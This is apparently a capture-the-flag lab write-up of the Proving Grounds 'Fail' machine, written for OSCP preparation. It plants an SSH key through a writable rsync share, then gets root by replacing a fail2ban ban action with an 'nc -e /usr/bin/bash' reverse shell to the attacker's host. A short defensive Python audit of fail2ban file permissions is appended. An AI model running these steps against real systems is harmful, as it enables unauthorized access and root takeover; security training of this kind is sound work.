Proving Grounds: Fail

Today we will take a look at Proving Grounds: Fail. I am sharing this post as part of my preparation for the OSCP exam, and also to show you the way if you get stuck. Please try to understand each step and take notes.

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
873/tcp open rsync (protocol version 31)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
└─# rsync -rdt rsync://192.168.250.126
fox fox home

Now let's try to enumerate “fox”.

└─# nc -nv 192.168.250.126 873
(UNKNOWN) [192.168.250.126] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
fox
@RSYNCD: OK
exit
└─# mkdir rsync-share
└─# cd rsync-share
└─# rsync -av fox@192.168.250.126::fox/ .
receiving incremental file list
./
.bash_history -> /dev/null
.bash_logout
.bashrc
.profile
└─# mkdir .ssh
└─# ssh-keygen -t rsa -N '' -f /root/.ssh/id_rsa
Generating public/private rsa key pair.
Created directory '/root/.ssh'.
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:kWwevUNAVqc1ZGmxzuHcDRmFxDQBJjO5Xccoowazrcg root@kali
The key's randomart image is:
+---[RSA 3072]----+
| .+.=oXB**.|
| oo+.X=o=+o|
| *=+=o+o. |
| o.+=*.o o |
| . .Soo = . .|
| E . . |
| |
| |
| |
+----[SHA256]-----+
└─# cp ~/.ssh/id_rsa.pub .ssh/authorized_keys
┌──(root㉿kali)-[~/ctf/rsync-share]
└─# ls -la .ssh
total 12
drwxr-xr-x 2 root root 4096 Oct 30 07:24 .
drwxr-xr-x 3 kali 1001 4096 Oct 30 07:23 ..
-rw-r--r-- 1 root root 563 Oct 30 07:24 authorized_keys
┌──(root㉿kali)-[~/ctf]
└─# rsync -avp rsync-share/ fox@192.168.250.126::fox/
sending incremental file list
./
.ssh/
.ssh/authorized_keys
sent 846 bytes received 46 bytes 356.80 bytes/sec

Login

└─# ssh -i /root/.ssh/id_rsa fox@192.168.250.126
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ whoami
fox

Linpeas.sh

pspy64

Enter the wrong password a few times.

fox@fail:/etc/fail2ban/action.d$ cat iptables-multiport.conf
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>

Add the malicious code

fox@fail:/etc/fail2ban/action.d$ cat iptables-multiport.conf
actionban = nc 192.168.49.250 4242 -e /usr/bin/bash

Listen

┌──(root㉿kali)-[~/ctf]
└─# nc -nvlp 4242

Enter the wrong password a few times.

And now we are root.
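The root step works because fox can edit a file that fail2ban executes on every ban. As an added example (not part of the original post), this audit lists every entry under a config tree such as /etc/fail2ban that a non-root account can modify; the modes in the constructed sample tree and the `trusted_uid`/`trusted_gids` parameters are assumptions.

```python
import os
import stat
import tempfile

def audit_tree(root, trusted_uid=0, trusted_gids=(0,)):
    """Return (path, reason) for each entry under `root` that an account other
    than `trusted_uid` can modify. Directories count: write access to one lets
    its writer replace any file inside it, even a root-owned one."""
    paths = [root]
    for dirpath, dirs, files in os.walk(root):
        paths += [os.path.join(dirpath, name) for name in dirs + files]
    findings = []
    for path in paths:
        st = os.lstat(path)
        if st.st_uid != trusted_uid:
            findings.append((path, "untrusted owner"))
        if stat.S_ISLNK(st.st_mode):
            continue  # symlink mode bits are always rwx; only the owner matters
        if st.st_mode & stat.S_IWOTH:
            findings.append((path, "world-writable"))
        # Assumption: only the gids in trusted_gids may hold write access.
        if st.st_mode & stat.S_IWGRP and st.st_gid not in trusted_gids:
            findings.append((path, "group-writable"))
    return sorted(findings)

def demo():
    """Constructed tree using the file names from this page. The modes are
    assumed; the page does not show the real ones."""
    with tempfile.TemporaryDirectory() as tmp:
        action_d = os.path.join(tmp, "action.d")
        os.mkdir(action_d)
        layout = {"jail.conf": 0o644, "action.d/iptables-multiport.conf": 0o664}
        for rel, mode in layout.items():
            path = os.path.join(tmp, rel)
            with open(path, "w") as fh:
                fh.write("# constructed sample\n")
            os.chmod(path, mode)
        os.chmod(action_d, 0o775)
        os.chmod(tmp, 0o755)
        # The test user stands in for root; no group is trusted with write access.
        found = audit_tree(tmp, trusted_uid=os.getuid(), trusted_gids=())
        return [(os.path.relpath(p, tmp), why) for p, why in found]

if __name__ == "__main__":
    for path, why in audit_tree("/etc/fail2ban"):
        print(f"{why}: {path}")
```

On a real host an empty result for /etc/fail2ban means only root (and the root group) can change what fail2ban runs on a ban.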

“If you have any questions or comments, please do not hesitate to write. Have a good day.”


Al1z4deh:~# echo "eJPT, CEH, OSCP"
